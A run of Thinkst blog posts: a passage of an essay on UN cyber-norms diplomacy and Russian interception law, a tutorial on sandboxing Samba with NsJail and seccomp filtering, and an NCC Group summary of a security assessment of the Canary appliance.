
What Thinkst and Microsoft both point to is a normative behavioural problem, and there is some fascinating (if tragic) history here. Early in 2017 Michele Markoff appeared for the US Department of State on a panel for the Carnegie Endowment for International Peace, and gave a wonderfully concise breakdown of this story down from its beginnings at the UN in 1998.[10] I recommend watching the video, but summarise here as well.
In late September of 1998, the Permanent Representative to the UN for the Russian Federation, Sergei Lavrov, transmitted a letter from his Minister of Foreign Affairs to the Secretary-General.[11] The letter serves as an explanatory memorandum for an attached draft resolution seeking to prohibit the development, production, or use by Member States of ‘particularly dangerous forms of information weapons.’[12] The Russian document voices many anxieties about global governance and security related to ICT which today issue from the US and the EU. Weird, right? At the time, Russian and US understandings of ‘information warfare’ were more-or-less harmonised; the term encompassed traditional electronic warfare (EW) measures and countermeasures, as well as information operations (i.e. propaganda). Whether or not the Russian ask in the autumn of 1998 was sincere is subject to debate, but it was unquestionably ambitious. UN A/C.1/53/3 remains one of my favourite artefacts of Russia's wild ‘90s and really has to be read to be believed.
So what happened? The US did their level best to water down the Russian draft resolution. In the late 1990s the US enjoyed unassailable technological overmatch in the digital domain, and there was no reason to yield any measure of sovereignty over their activities in that space at the request of a junior partner (i.e. Russia). Or so the magical thinking went. The resolution ultimately adopted (unanimously, without a vote) by the UN General Assembly in December 1998 was virtually devoid of substance.[13] And it is that document which has informed the character of UN activities in the area of ‘Developments in the field of information and telecommunications in the context of international security’ ever since.[14] Ironically, the US and like-minded states have now spent about a decade trying to claw their way back to a set of principles not unlike those laid out in the original draft resolution transmitted by Lavrov. Sincere or not, the Russian overture of late 1998 was a bungled opportunity.[15]

State sovereignty vs digital governance

This may seem illogical, but the fault line through the UN GGE on ICT security has never been large vs small states.[16] Instead, it has been those states which privilege the preservation of national sovereignty and freedom from interference in internal affairs vs those states receptive to the idea that their domestic digital governance should reflect existing standards set out in international humanitarian and human rights law. And states have sometimes shifted camps over time. Remember that the Geneva Conventions apply in a more limited fashion to internal conflicts than they do to international conflicts? Whether a state is considering commitment to behave consistently with the spirit of international law in their internal affairs, or commitment to neutrality as a desirable guiding principle of digital governance, both raise the question of state sovereignty.
As it happens, those states which tend to aggressively defend the preservation of state sovereignty in matters of digital governance tend to be those which heavily censor or otherwise leverage their ICT infrastructure for the purposes of state security. In early 2015 Permanent Representatives to the UN from China, Kazakhstan, the Russian Federation, Tajikistan, and Uzbekistan sent a letter to the Secretary-General to the effect of ‘DON’T TREAD ON ME’ in response to proposed ’norms, rules, and principles for the responsible behaviour of States’ by the GGE for ICT security.[17] Armenia, Belarus, Cuba, Ecuador, Turkey, and other have similarly voiced concern in recent years that proposed norms may violate their state sovereignty.[18]
During the summer of 2017, the UN GGE for ICT security imploded.[19] With China and the Russian Federation having effectively walked away 30 months earlier, and with decades of unresolved disagreement regarding the relationship between state sovereignty, information, and related technologies... colour me shocked.

Hard things are hard

So, how do we safeguard against interference with software companies by intelligence services or other government entities in the absence of a binding international standard? The short answer is : rule of law.
Thinkst’s assertion that ‘there is no technical control that’s different’ between the US and Russian hypotheticals is not accurate. Russian law and lawful interception standards impose technical requirements for access and assistance that do not exist in the United States.[20] When we compare the two countries, we are not comparing like to like. Declining to comply with a federal law enforcement request in the US might get you a public showdown and fierce debate by constitutional law scholars, because that can happen under US law. It is nigh unthinkable that a Russian company could rebel in this manner without consequences for their operations, profitability, or, frankly, for their physical safety, because Russian law is equally clear on that point.
Software companies are not sovereign entities; they do not get to opt out of the legal regimes and geopolitical concerns of the countries in which they are domiciled.[21] In Kaspersky’s case, thinking people around DC have never been hung up on the lack of technical controls ensuring good behaviour. What we have worried about for years is the fact that the legal regime Kaspersky is subject to as a Russian company comfortably accommodates compelled access and assistance without due process, or even a warrant.[22] In the US case, the concern is that abuses by intelligence or law enforcement agencies may occur when legal authorisation is exceeded or misinterpreted. In states like Russia, those abuses and the technical means to execute them are legally sanctioned.
It is difficult enough to arrive at consensus in international law when there is such divergence in the law of individual states. But when it comes to military operations (as distinct from espionage or lawful interception) in the digital domain, we don’t even have divergence in the customary law of states as a starting point. Until states begin to acknowledge their activities and articulate their own legal reasoning, their own understandings of proportionate response, necessity, damage, denial, &c. for military electromagnetic and information operations, the odds of achieving binding international consensus in this area are nil. And there is not a lot compelling states to codify that reasoning at present. As an industry, information security tends to care about nation-state operations to the extent that such attribution can help pimp whatever product is linked below the analysis, and no further. With the odd exception, there is little that can be called rigorous, robust, or scientific about the way we do this. So long as that remains true – so long as information security persists in its methodological laziness on the excuse that perfect confidence is out of reach – I see no externalities which might hasten states active in this domain to admit as much, let alone volunteer a legal framework for their operations.
At present, we should be much more concerned with encouraging greater specificity and transparency in the legal logics of individual states than with international norms creation on a foundation of sand. The ‘X for Y’ anti-pattern deserves its eyerolls in the case of a Geneva Convention for software, but for different reasons than advocates of this approach generally appreciate.
-mara 

[1] Thinkst Thoughts, ‘A Geneva Convention, for software,’ 26 October 2017, http://blog.thinkst.com/2017/10/a-geneva-convention-for-software.html.
[2] Brad Smith, Microsoft On the Issues : ‘The need for a digital Geneva Convention,’ 14 February 2017, https://blogs.microsoft.com/on-the-issues/2017/02/14/need-digital-geneva-convention/; Brad Smith and Carol Ann Browne, LinkedIn Pulse : ‘What the founding of the Red Cross can teach us about cyber warfare,’ 29 October 2017, https://www.linkedin.com/pulse/what-founding-red-cross-can-teach-us-cyber-warfare-brad-smith/.
[3] See Jean S Pichet, Commentary : the Geneva Conventions of 12 August 1949, (Geneva : International Committee of the Red Cross, 1958), https://www.loc.gov/rr/frd/Military_Law/pdf/GC_1949-IV.pdf.
[4] See Jean S Pichet, Commentary : the Geneva Conventions of 12 August 1949, (Geneva : International Committee of the Red Cross, 1952), https://www.loc.gov/rr/frd/Military_Law/pdf/GC_1949-I.pdf.
[5] Groups of Governmental Experts (GGEs) are convened by the UN Secretary-General to study and develop consensus around questions raised by resolutions adopted by the General Assembly. When there is need to Do Something, but nobody knows or can agree on what that Something is, a GGE is established. Usually after a number of other, more ad hoc experts' meetings have failed to deliver consensus. For brevity we often refer to this GGE as 'the GGE for ICT security' or 'the GGE for cybersecurity'. https://www.un.org/disarmament/topics/informationsecurity/
[6] Thinkst Thoughts, ‘A Geneva Convention, for software,’ 26 October 2017, http://blog.thinkst.com/2017/10/a-geneva-convention-for-software.html.
[8] Regulating internecine conflict is extra hard, and also not very popular. See Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of Non-International Armed Conflicts (Protocol II), 8 June 1977.
[9] Col Gary D Brown has produced consistently excellent work on this subject. See, e.g., Gary D Brown, "The Cyber Longbow & Other Information Strategies: U.S. National Security and Cyberspace” (28 April 2017). 5 PENN. ST. J.L. & INT’L AFF. 1, 2017, https://ssrn.com/abstract=2971667; Gary D Brown “Spying and Fighting in Cyberspace: What is Which?” (1 April 2016). 8 J. NAT’L SECURITY L. & POL’Y, 2016, https://ssrn.com/abstract=2761460; Gary D Brown and Andrew O Metcalf, “Easier Said Than Done : Legal Review of Cyber Weapons” (12 February 2014). 7 J. NAT’L SECURITY L. & POL’Y, 2014, https://ssrn.com/abstract=2400530. See also, Gary D Brown, panel remarks, ’New challenges to the laws of war : a discussion with Ambassador Valentin Zellweger,’ (Washington, DC : CSIS), 30 October 2015, https://www.youtube.com/watch?v=jV-A21jQWnQ&feature=youtu.be&t=27m36s.
[10] Michele Markoff, panel remarks, ‘Cyber norms revisited : international cybersecurity and the way forward’ (Washington, DC : Carnegie Endowment for Int’l Peace) 6 February 2017, https://www.youtube.com/watch?v=nAuehrVCBBU&feature=youtu.be&t=4m10s.
[11] United Nations, General Assembly, Letter dated 23 September 1998 from the Permanent Representative of the Russian Federation to the United Nations addressed to the Secretary-General, UN GAOR 53rd Sess., Agenda Item 63, UN Doc. A/C.1/53/3 (30 September 1998), https://undocs.org/A/C.1/53/3.
[12] ibid., (3)(c).
[13] GA Res. 53/70, 'Developments in telecommunications and information in the context of international security,’ UN GAOR 53rd Sess., Agenda Item 63, UN Doc. A/RES/53/70 (4 December 1998), https://undocs.org/a/res/53/70.
[14] See GA Res. 54/49 of 1 December 1999, 55/28 of 20 November 2000, 56/19 of 29 November 2001, 57/53 of 22 November 2002, 58/32 of 8 December 2003, 59/61 of 3 December 2004, 60/45 of 8 December 2005, 61/54 of 6 December 2006, 62/17 of 5 December 2007, 63/37 of 2 December 2008, 64/25 of 2 December 2009, 65/41 of 8 December 2010, 66/24 of 2 December 2011, 67/27 of 3 December 2012, 68/243 of 27 December 2013, 69/28 of 2 December 2014, 70/237 of 23 December 2015, and 71/28 of 5 December 2016.
[15] This assessment is somewhat complicated. Accepting any or all of the proposed definitions, codes of conduct, &c. proffered by the Russian Federation over the years may have precluded some actions allegedly taken by the United States, but unambiguously would have prohibited the massive-scale disinformation and influence operations that have become a hallmark of Russian power projection abroad. Similarly, Russian innovations in modular malware with the demonstrated purpose and capability to perturb, damage, or destroy physical critical infrastructure systems would have been contraindicated by their own language.
[16] See, e.g., the Russian reply to 'Developments in telecommunications and information in the context of international security,’ Report of the Secretary-General, UN GAOR 54th Sess., Agenda Item 71, UN Doc. A/54/213 (9 June 1999), pp. 8-10, https://undocs.org/a/54/213; the Russian reply to 'Developments in telecommunications and information in the context of international security,’ Report of the Secretary-General, UN GAOR 55th Sess., Agenda Item 68, UN Doc. A/55/140 (12 May 2000), pp. 3-7, https://undocs.org/a/55/140; the Swedish reply (on behalf of Member States of the European Union) to 'Developments in telecommunications and information in the context of international security,’ Report of the Secretary-General, UN GAOR 56th Sess., Agenda Item 69, UN Doc. A/56/164 (26 June 2001), pp. 4-5, https://undocs.org/a/56/164; and the Russian reply to ibid., UN GAOR 56th Sess., Agenda Item 69, UN Doc. A/56/164/Add.1 (21 June 2001), pp. 2-6, https://undocs.org/a/56/164/add.1.
[17] United Nations, General Assembly, Letter dated 9 January 2015 from the Permanent Representatives of China, Kazakhstan, Kyrgyzstan, the Russian Federation, Tajikistan and Uzbekistan to the United Nations addressed to the Secretary-General, UN GAOR 69th Sess., Agenda Item 91, UN Doc. A/69/723 (9 January 2015), https://undocs.org/a/69/723.
[18] States’ replies since the 65th Session (2010) indexed at https://www.un.org/disarmament/topics/informationsecurity/.
[19] See, e.g., Arun Mohan Sukumar, ‘The UN GGE failed. Is international law in cyberspace doomed as well?,’ Lawfare, 4 July 2017, https://lawfareblog.com/un-gge-failed-international-law-cyberspace-doomed-well, and Elaine Korzak, The Debate : ‘UN GGE on cybersecurity : the end of an era?,’ The Diplomat, 31 July 2017, https://thediplomat.com/2017/07/un-gge-on-cybersecurity-have-china-and-russia-just-made-cyberspace-less-safe/.
[20] Prior to the 2014 Olympics in Sochi, US-CERT warned travellers that
Russia has a national system of lawful interception of all electronic communications. The System of Operative-Investigative Measures, or SORM, legally allows the Russian FSB to monitor, intercept, and block any communication sent electronically (i.e. cell phone or landline calls, internet traffic, etc.). SORM-1 captures telephone and mobile phone communications, SORM-2 intercepts internet traffic, and SORM-3 collects information from all forms of communication, providing long-term storage of all information and data on subscribers, including actual recordings and locations. Reports of Rostelecom, Russia’s national telecom operator, installing deep packet inspection (DPI ) means authorities can easily use key words to search and filter communications. Therefore, it is important that attendees understand communications while at the Games should not be considered private.’
Department of Homeland Security, US-CERT, Security Tip (ST14-01) ’Sochi 2014 Olympic Games’ (NCCIC Watch & Warning : 04 February 2014). https://www.us-cert.gov/ncas/tips/ST14-001 See, also, Andrei Soldatov and Irina Borogan, The Red Web : the struggle between Russia’s digital dictators and the new online revolutionaries, (New York : Public Affairs, 2017 [2015]).
[21] In the United States, this has become a question of the extraterritorial application of the Stored Communications Act (18 USC § 2703) in the presence of a warrant, probable cause, &c. dressed up as a privacy debate. See Andrew Keane Woods, ‘A primer on Microsoft Ireland, the Supreme Court’s extraterritorial warrant case,’ Lawfare, 16 October 2017, https://lawfareblog.com/primer-microsoft-ireland-supreme-courts-extraterritorial-warrant-case.
[22] At the time of writing, eight Russian law enforcement and security agencies are granted direct access to SORM : the Ministry of Internal Affairs (MVD), Federal Security Service (FSB), Federal Protective Service (FSO), Foreign Intelligence Service (SVR), Federal Customs Service (FTS), Federal Drug Control Service (FSKN), Federal Penitentiary Service (FSIN), and the Main Intelligence Directorate of the General Staff (GRU). Federal Laws 374-FZ and 375-FZ of 6th July 2016 ('On Amendments to the Criminal Code of the Russian Federation and the Code of Criminal Procedure of the Russian Federation with regard to establishing additional measures to counter terrorism and ensure public security’), also known as the ‘Yarovaya laws,’ will enter into force on 1st July 2018; these laws substantially eliminate warrant requirements for communications and metadata requests to Russian telecommunications companies and ISPs, and additionally impose retention and decryption for all voice, text, video, and image communications. See, e.g., DR Analytica, report, ‘Yarovaya law : one year after,’ 24 April 2017, https://analytica.digital.report/en/2017/04/24/yarovaya-law-one-year-after/.

Sandboxing: a dig into building your security pit


Introduction

Sandboxes are a good idea. Whether it's improving kids’ immune systems, or isolating your apps from the rest of the system, sandboxes just make sense. Despite their obvious benefits, they are still relatively uncommon. We think this is because they remain obscure to most developers, and we hope this post will help fix that.

Sandboxes? What’s that?

Software sandboxes isolate a process from the rest of the system, constraining the process’ access to the parts of the system that it needs and denying access to everything else. A simple example of this would be opening a PDF in (a modern version of) Adobe Reader. Since Adobe Reader now makes use of a sandbox, the document is opened in a process running in its own constrained world, isolated from the rest of the system. This limits the harm that a malicious document can cause, and is one of the reasons why malicious PDFs have dropped from being the number-1 attack vector seen in the wild as more and more users updated to sandbox-enabled versions of Adobe Reader.

It's worth noting that sandboxes aren't magic; they simply limit the tools available to an attacker and limit an exploit’s immediate blast-radius. Bugs in the sandboxing process can still yield full access to key parts of the system, rendering the sandbox almost useless.

Sandboxes in Canary

Long time readers will know that Canary is our well-loved honeypot solution. (If you are interested in breach detection that’s quick to deploy and works, check us out at https://canary.tools/)


A Canary is a high quality, mixed interaction honeypot. It’s a small device that you plug into your network which is then able to imitate a large range of machines (a printer/ your CEO's laptop/ a file server, etc). Once configured it will run zero or more services such as SSH, Telnet, a database or Windows File Sharing. When people interact with these fake hosts and fake services, you get an alert (and a high quality signal that you should cancel your weekend plans).

Almost all of our services are implemented in a memory safe language, but in the event that customers want a Windows File Share, we rely on the venerable Samba project (before settling on Samba, we examined other SMB possibilities, like the excellent impacket library, but Samba won since our Canaries (and their file shares) can be enrolled into Active Directory too). Since Samba runs as its own service and we don't have complete control over its internal workings, it becomes a prime candidate for sandboxing: we wanted to be able to restrict its access to the rest of the system in case it is ever compromised.

Sandboxing 101

As a very brief introduction to sandboxing we'll explain some key parts of what Linux has to offer (a quick Google search will yield far more comprehensive articles, but one interesting resource, although not Linux focused, is this video about Microsoft Sandbox Mitigations).

Linux offers several ways to limit processes which we took into consideration when deciding on a solution that would suit us. When implementing a sandbox solution you would choose a combination of these depending on your environment and what makes sense.


Control groups

Control groups (cgroups) limit and control access to and usage of resources such as CPU, memory, disk and network.


Chroot

This involves changing the apparent root directory of the file-system that the process can see. It ensures that the process does not have access to the whole file system, but only the parts that it should be able to see. Chroot was one of the first attempts at sandboxing in the Unix world, but it was quickly determined that it wasn’t enough to constrain attackers.
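As a tiny illustration (assuming a statically linked busybox, so the jailed shell has no library dependencies):

mkdir -p /var/safe_directory/bin
cp /bin/busybox /var/safe_directory/bin/
# the shell below sees /var/safe_directory as / and nothing above it
sudo chroot /var/safe_directory /bin/busybox sh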


Seccomp

Standing for "secure computing mode", this lets you limit the syscalls that a process can make. Limiting syscalls means that a process will only be able to perform the system operations that you expect it to perform, so if an attacker compromises your application, they won't be able to run wild.


Capabilities

These are the set of privileged operations that can be performed on the Linux system. Some capabilities include setuid, chroot and chown. For a full list you can take a look at the source here. However, they’re also not a panacea, and spender has shown (frequently) how a limited set of Capabilities can be leveraged into the full set (effectively root).


Namespaces

Without namespaces, any process would be able to see all processes' system resource information. Namespaces virtualise resources like hostnames, user IDs or network resources so that a process cannot see information from other processes.
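A quick way to see this in action is util-linux's unshare tool:

# start ps in new PID and mount namespaces; it only sees processes inside them
sudo unshare --pid --fork --mount-proc ps aux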

Adding sandboxing to your application in the past meant using some of these primitives natively (which probably seemed hairy for most developers). Fortunately, these days, there are a number of projects that wrap them up in easy-to-use packages.



Choosing our solution

We needed to find a solution that would work well for us now, but would also allow us to easily expand once the need arises without requiring a rebuild from the ground up.

The solution we wanted would need to at least address Seccomp filtering and a form of chroot/pivot_root. Syscall filtering is easy to manage if you can get the full syscall profile of a service, and once filtering is in place you can sleep a little safer knowing the service can't perform syscalls that it shouldn't. Limiting the view of the filesystem was another easy choice for us. Samba only needs access to specific directories and files, and lots of those files can also be set to read-only.

We evaluated a number of options, and decided that the final solution should:

  • Isolate the process (Samba)
  • Retain the real hostname
  • Still be able to interact with a non-isolated process
Another process had to be able to intercept Samba network traffic, which meant we couldn’t put Samba in a network namespace without bringing that extra process in.

This ruled out something like Docker, as although it provided an out-of-the-box high level of isolation (which is perfect for many situations), we would have had to turn off a lot of the features to get our app to play nicely.

Systemd and nsroot (which looks abandoned) both focused more on specific isolation techniques (seccomp filtering for Systemd and namespace isolation for nsroot) but weren’t sufficient for our use case.

We then looked at NsJail and Firejail (Google vs Mozilla, although that played no part in our decision). Both were fairly similar and provided us with flexibility in terms of what we could limit, putting them a cut above the rest.

In the end, we decided on NsJail, but since they were so similar, we could have easily gone the other way, i.e. YMMV.


NsJail
NsJail, as simply stated in its overview, "is a process isolation tool for Linux" developed by the team at Google (though it's not officially recognised as a Google product). It provides isolation for namespaces, file-system constraints, resource limits, seccomp filters, cloned/isolated ethernet interfaces and control groups.

Furthermore, it uses kafel (another non-official Google product) which allows you to define syscall filtering policies in a config file, making it easy to manage/maintain/reuse/expand your configuration.

A simple example of using NsJail to isolate processes would be:

./nsjail -Mo --chroot /var/safe_directory --user 99999 --group 99999 -- /bin/sh -i
Here we are telling NsJail to:
-Mo:               launch a single process using clone/execve

--chroot:          set /var/safe_directory as the new root directory for the process

--user/--group:    set the uid and gid to 99999 inside the jail

-- /bin/sh -i:     our sandboxed process (in this case, launch an interactive shell)
We are setting our chroot to /var/safe_directory. It is a valid chroot that we have created beforehand. You can instead use --chroot / for your testing purposes (in which case you really aren’t using the chroot at all).

If you launch this and run ps aux and id, you’ll see something like the below:
$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
99999        1  0.0  0.1   1824  1080 ?        SNs  12:26   0:00 /bin/sh -i
99999       11  0.0  0.1   3392  1852 ?        RN   12:32   0:00 ps ux
$ id
uid=99999 gid=99999 groups=99999
What you can see is that you are only able to view processes initiated inside the jail.

Now let's try adding a filter to this:

./nsjail -Mo --chroot /var/safe_directory --user 99999 --group 99999 --seccomp_string 'POLICY a { ALLOW { write, execve, brk, access, mmap, open, newfstat, close, read, mprotect, arch_prctl, munmap, getuid, getgid, getpid, rt_sigaction, geteuid, getppid, getcwd, getegid, ioctl, fcntl, newstat, clone, wait4, rt_sigreturn, exit_group } } USE a DEFAULT KILL' -- /bin/sh -i
Here we are telling NsJail to:
-Mo:               launch a single process using clone/execve

--chroot:          set /var/safe_directory as the new root directory for the process

--user/--group:    set the uid and gid to 99999 inside the jail

--seccomp_string:  use the provided seccomp policy

-- /bin/sh -i:     our sandboxed process (in this case, launch an interactive shell)
If you try to run id now you should see it fail. This is because we have not given it permission to use the required syscalls:
$ id
Bad system call
The idea for us then would be to use NsJail to execute smbd as well as nmbd (both are needed for our Samba setup) and only allow expected syscalls.

Building our solution
Starting with a blank config file, and focusing on smbd, we began adding restrictions to lock down the service.

First we built the seccomp filter list to ensure the process only had access to syscalls that were needed. This was easily obtained using perf:

perf record -e 'raw_syscalls:sys_enter' -- /usr/sbin/smbd -F
This recorded all syscalls used by smbd into perf's format. To output the syscalls in a readable list format we used:
perf script | grep -oP "(?<= NR )[0-9]+" | sort -nu
One thing to mention here is that syscalls can be named differently depending on where you look. Even just between `strace` and `nsjail`, a few syscall names have slight variations from the names in the Linux source. This means that if you use the syscall names you won't be able to directly use the exact same list between different tools, but may need to rename a few of them. If you are worried about this, you can opt instead to use the syscall numbers. These are a robust, tool-independent way of identifying syscalls.

After we had our list in place, we set about limiting FS access as well as fiddling with some final settings in our policy to ensure it was locked down as tight as possible.

A rather interesting way to test that the config file was working as expected was to launch a shell using the config and test the protections manually:

./nsjail --config smb.cfg -- /bin/sh -i
Once the policy was tested and we were happy that smbd was running as expected, we did the same for nmbd.
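For completeness, the final launch commands end up looking much like the test invocation above (a sketch; the config file names here are illustrative, not necessarily what ships on a Canary):

./nsjail --config smb.cfg -- /usr/sbin/smbd -F
./nsjail --config nmb.cfg -- /usr/sbin/nmbd -F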

With both services sandboxed we performed a couple of long running tests to ensure we hadn't missed anything. This included leaving the services running over the weekend as well as testing them out by connecting to them from different systems. After all the testing and not finding anything broken, we were happy to sign off.

What does this mean for us?

Most canned exploits against Samba expect a stock system with access to system resources. At some point in the future, when the next Samba 0-day surfaces, there’s a good chance that generic exploits against our Samba will fail as it tries to exercise syscalls we haven’t expressly permitted. But even if an attacker were to compromise Samba, and spawn himself a shell, this shell would be of limited utility with a constrained view of the filesystem and the system in general.

What does this mean for you?
We stepped you through our process of implementing a sandbox for our Samba service. The aim was to get you thinking about your own environment and how sandboxing could play a role in securing your applications. We wanted to show you that it isn't an expensive or overly complicated task. You should try it, and if you do, drop us a note to let us know how it went!



A third party view on the security of the Canaries

(Guest post by Ollie Whitehouse)

tl;dr

Thinkst engaged NCC Group to perform a third party assessment of the security of their Canary appliance. The Canaries came out of the assessment well. When compared in a subjective manner to the vast majority of embedded devices and/or security products we have assessed and researched over the last 18 years, they were very good.

Who is NCC Group and who am I?

Firstly, it is prudent to introduce myself and the company I represent. My name is Ollie Whitehouse and I am the Global CTO for NCC Group. My career in cyber spans over 20 years in areas such as applied research, internal product security teams at companies like BlackBerry and, of course, consultancy. NCC Group is a global professional and managed security firm with its headquarters in the UK and offices in the USA, Canada, Netherlands, Denmark, Spain, Singapore and Australia to mention but a few.

What were we engaged to do?

Quite simply, we were tasked to see if we could identify any vulnerabilities in the Canary appliance that would have a meaningful impact on real-world deployments in real-world threat scenarios. The assessment was entirely white box (i.e. undertaken with full knowledge, code access, etc.).

Specifically the solution was assessed for:

  • Common software vulnerabilities
  • Configuration issues
  • Logic issues, including those involving the enrolment and update processes
  • General privacy and integrity of the solution

The solution was NOT assessed for:

  • The efficacy of Canary in an environment
  • The ability to fingerprint and detect a Canary
  • Operational security of the Thinkst SaaS

What did NCC Group find?

NCC Group staffed a team with a combined experience of over 30 years in software security assessments to undertake this review, for what I consider a reasonable amount of time given the code base size and product complexity.

We found a few minor issues, including a few broken vulnerability chains, but overall we did not find anything that would facilitate a remote breach.

While we would never make any warranties, it is clear from the choice of programming languages, design and implementation that there is a defence-in-depth model in place. The primitives around cryptography usage are also robust, avoiding many of the pitfalls seen more widely in the market.

The conclusion of our evaluation is that the Canary platform is well designed and well implemented from a security perspective. Although there were some vulnerabilities, none of these were significant, none would be accessible to an unauthenticated attacker and none affected the administrative console. The Canary device is robust from a product security perspective based on current understanding.

So overall?

The device platform and its software stack (outside of the base OS) has been designed and implemented by a team at Thinkst with a history in code product assessments and penetration testing (a worthy opponent one might argue), and this shows in the positive results from our evaluation.

Overall, Thinkst have done a good job and shown they are invested in producing not only a security product but also a secure product.

_________

<haroon> Are you a customer who wishes to grab a copy of the report? Mail us and we will make it happen.


RSAC 2018 - A Recap...
